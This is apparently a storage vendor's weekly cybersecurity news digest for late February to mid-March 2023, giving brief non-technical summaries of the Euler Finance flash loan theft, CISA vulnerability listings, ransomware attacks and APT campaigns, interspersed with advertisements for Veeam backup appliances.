Weekly
Mar 13 - 17, 2023
Euler Finance, a lending protocol, lost $197 million of digital assets in a flash loan attack. The attacker took $18.5M WBTC, $8.75M DAI, $33.85M USDC, and $135.8M stETH. The attackers use Tornado Cash, a sanctioned mixer, to launder the stolen funds. Researchers warn the exploit of flash loans and weakness in Euler's donation and liquidation system. Flawed logic enabled attackers to manipulate the conversion rate and profit from liquidation. Read more
CISA added Plex Media Server vulnerability (CVE-2020-5741) to its flaw list. Attackers with admin access can execute arbitrary Python code remotely. LastPass breach likely used this. CISA also added VMware Cloud Foundation's CVE-2021-39144 to its exploited vulnerabilities list, urging organizations to patch. Read more
HACLA warns of LockBit ransomware cyber-incident, causing a data leak. Hackers accessed sensitive information from January to December 2022, including personal identification numbers, financial and medical data. Ransom demands were not met, and hackers threatened to publish all stolen files. HACLA advised affected individuals to monitor accounts, place fraud alerts, and report identity theft incidents. Read more
BianLian ransomware group now threatens to leak victim data for ransom instead of just encrypting it. Using its custom backdoor to remotely access devices, BianLian listed 118 victim organizations on its extortion portal, most being US-based firms. The group points out legal and regulatory risks that victims may face if breaches become public. Researchers say that the attackers are improving their extortion skills by analyzing legal risks of victims. Read more
Is your enterprise storage optimized for performance and scalability? If not, you could be wasting valuable resources and missing out on potential growth. StoneFly's latest blog offers a comprehensive guide for IT managers and storage administrators on sizing enterprise SAN appliances for optimal storage. Learn how to identify the right storage capacity, calculate IOPS and throughput requirements, and ensure data redundancy and availability. With StoneFly's expert guidance, you can ensure your enterprise storage is meeting your needs and maximizing your investments. Read more
Winter Vivern, a pro-Russian APT group, has been targeting European government organizations and telecommunication service providers in a cyberespionage campaign. They use fake web pages resembling government agencies to distribute malicious files. They employ Windows batch files to impersonate antivirus scanners to download malicious payloads using PowerShell. The Aperetif payload is capable of automatic file scanning and exfiltration, taking screenshots, and sending all data to a hardcoded command and control server URL. Read more
192TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with 20 Veeam Backup Essential Annual Subscription Licenses for $15,995.
10th Gen, 12-bay 2U Rackmount unit with 12x16TB (192TB) Enterprise SAS drives, 10 Core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.
All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.
For appliance demos, specifications, and quotes contact us.
Weekly
Mar 6 - 10, 2023
Microsoft Word has a severe vulnerability (CVE-2023-21716) that allows remote code execution without user interaction. The flaw is triggered by a heap corruption vulnerability in the RTF parser and can compromise the system by only loading the file in the Preview Pane. Microsoft has released security updates and workarounds to address the issue. Read more
Oakland was hit by a Play ransomware gang cyberattack that caused significant disruption to its IT systems, except for 911 dispatch, fire emergency services, and financial systems. The city has declared a local state of emergency and is unable to process online payments for business taxes and parking citations. The attack affected phone services, payment processing, report processing, and permit & license issuance. The Play ransomware gang is leaking confidential data, including passports and employee information. Read more
The RansomHouse group targeted the Hospital Clínic de Barcelona in a ransomware attack, disrupting emergency services at three affiliated medical centers. The attack occurred in virtualized environments, limiting physician access to patient information and leading to postponed surgeries and cancelled appointments. Clínic de Barcelona has taken measures to minimize the impact of the attack. Read more
Cybercriminals are using job-themed phishing and malware attacks to target job seekers and employers, aiming to steal confidential data and infiltrate company systems. Phishing campaigns trick job seekers into disclosing personal information or login credentials, while malware infects devices. Cybercriminals also pose as job seekers to target employers with malware delivered via attachments or URLs disguised as resumes or IDs. Stolen documents such as Social Security numbers and driver's licenses are also used to enhance credibility. Read more
Organizations need to choose the right cloud solution for their needs, with on-premise and private cloud being the two most common options. To make an informed decision, it's important to understand their differences. Explore the differences between on-premise and private cloud, including storage, computing, and security.
The "Hiatus" hacking campaign targets DrayTek Vigor routers, using a malicious bash script and malware named "HiatusRAT" to transform them into SOCKS5 proxies. This enables the threat actor to collect data and forward traffic from other infected devices through the breached router. The campaign has affected over 100 businesses in Europe, North America, and South America. Read more
100TB fully air-gapped and immutable Veeam backup and disaster recovery (DR) appliance with object and file lockdown technology for ransomware protection & instant multi-VM recovery.
It is 2U, 8 Bay Rackmount unit with 6x16TB Enterprise SAS drives, 12 core Storage Virtualization Engine, 128GB System Memory, 512GB NVMe SSD, Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller. Fully Integrated SAN, NAS and optional S3 cloud object storage.
Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.
For appliance demos, specifications, and quotes contact us.
Weekly
Feb 27 - Mar 3, 2023
CISA adds CVE-2022-36537 to "Known Exploited Vulnerabilities Catalog" for ZK Framework versions 8.6.4.1 to 9.6.1. Attackers exploit the vulnerability via POST requests to AuUploader component to access sensitive information. Backdoor found in 286 servers, March 20, 2023, is the deadline for security updates. Read more
PureCrypter malware has targeted government organizations in Asia-Pacific and North America with ransomware and information stealers, including AgentTesla, Redline Stealer, Blackmoon, Eternity, and Philadelphia Ransomware. The attack starts with an email containing a Discord app URL leading to a password-protected ZIP archive housing PureCrypter malware. The campaign employs AgentTesla and XOR encryption to safeguard communications with the C2 server and uses process hollowing to avoid detection. Read more
BlackLotus, the first malware to bypass UEFI Secure Boot defenses, uses a security flaw called 'Baton Drop' to establish persistence and execute arbitrary code on Windows 11 systems. It has geofencing capabilities, disables security mechanisms, and communicates with a C2 server to fetch additional malware. BlackLotus is installed using CVE-2022-21894 and automatically executes on every system, deploying kernel drivers and running next-stage payloads. Read more
SCARLETEEL campaign targets public-facing containerized web apps to infiltrate cloud services, exploit Kubernetes cluster vulnerabilities on AWS, deploy XMRig, perform AWS API calls, steal credentials and data, and attempt to disable CloudTrail logs. Read more
Ransomware attacks are on the rise due to outdated IT infrastructure, sophisticated techniques, and the pandemic. Many organizations lack sufficient cybersecurity protocols, leading to alarming levels of attacks. Check out the 2022 ransomware statistics and trends in this overview. Read more
Researchers warn Asian materials sector of APT threat Winnti, active since 2007. Winnti targets two conglomerate subsidiaries using various tools. Clasiopa accessed Asian materials research organization by brute-forcing servers and used post-exploitation tools. Atharvan backdoor downloads files and communicates with C2 server, while modified Lilith RAT executes remote commands. Atharvan analysis suggests threat actor may be in India. Read more
80TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with Object Lockdown Technology for Ransomware protection & Instant multi VM recovery.
It is 2U, 8 Bay Rackmount unit with 8x10TB Enterprise SAS drives, 12 Core Storage Virtualization Engine, 128GB System Memory, 512GB NVMe SSD, Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller. Fully Integrated SAN, NAS and optional S3 cloud object storage.
Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.
For appliance demos, specifications, and quotes contact us.